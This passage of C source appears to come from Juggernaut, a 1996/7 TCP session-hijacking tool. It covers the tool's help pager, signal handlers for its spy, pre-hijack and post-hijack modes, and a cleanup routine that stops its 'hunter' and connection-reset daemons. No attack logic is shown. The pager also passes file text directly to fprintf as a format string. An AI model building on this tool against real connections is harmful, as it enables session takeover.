(don't do this) -V version information -t xx network read timeout in seconds (defaults to 10) Invoked without arguments, Juggernaut starts in `normal` mode.\n\n",nomenclature); exit(0); } /* * Simple file pager. */ void bookworm(){ FILE *fp; char tempBuf[FBUFSIZE],buf[MINIBUF]; int i=0; if(!(fp=fopen(HELPFILE,"r"))){ if(verbosity){ fprintf(stderr,"Cannot open help file.\n"); fprintf(stderr,"[cr]"); getchar(); return; } } while(fgets(tempBuf,FBUFSIZE-1,fp)){ fprintf(stderr,tempBuf); if(i==24){ fprintf(stderr,"\n[cr,q] >"); bzero(&buf,sizeof(buf)); fgets(buf,sizeof(buf-1),stdin); if(buf[0]=='q')break; i=0; } else i++; } } /* * Main signal handler to facilitate clean exits. */ void twitch(){ void cleanexit(); if(verbosity)fprintf(stderr,"\nCaught signal, exiting cleanly.\n"); signal(SIGINT,SIG_DFL); signal(SIGQUIT,SIG_DFL); cleanexit(); } /* * Used as a catchall to cleanly exit proccesses */ void spasm(){ extern int linksock; if(linksock)close(linksock); /* Hunter should have this... */ exit(0); } /* * Spy signal handler. */ void convulsion(){ void twitch(); extern int sigsentry; if(verbosity)fprintf(stderr,"\nCaught signal.\n"); fprintf(stderr,"[cr]"); getchar(); signal(SIGINT,twitch); sigsentry=0; } /* * Pre-hijacking signal handler. */ void sputter(){ void twitch(); extern int sigsentry; if(verbosity)fprintf(stderr,"\nCaught prehijack signal.\n"); signal(SIGINT,twitch); sigsentry=0; } /* * Post-hijacking signal handler. */ void seizure(){ void twitch(); extern int sigsentry; if(verbosity)fprintf(stderr,"\nCaught posthijack signal.\n"); sigsentry=0; signal(SIGINT,twitch); } /* * Exit Cleanly. */ void cleanexit(){ void powerdown(); extern int ripsock; extern int hpid; extern int acrstpid; close(ripsock); powerdown(); if(kill(hpid,SIGUSR1))if(verbosity){ /* Send signal to the hunter */ perror("(cleanexit) Could not signal hunter"); fprintf(stderr,"[cr]"); getchar(); } if(acrstpid) /* Send signal to the automated connection reset daemon. XXX - This only signals one daemon! If more exist, they will be left stranded! */ if(kill(acrstpid,SIGUSR1))if(verbosity){ perror("(cleanexit) Could not signal ACRSTD"); fprintf(stderr,"[cr]"); getchar(); } fprintf(stderr,"Juggernaut is a Guild Corporation production, (c) 1996/7.\n\n"); exit(0); } <--> EOF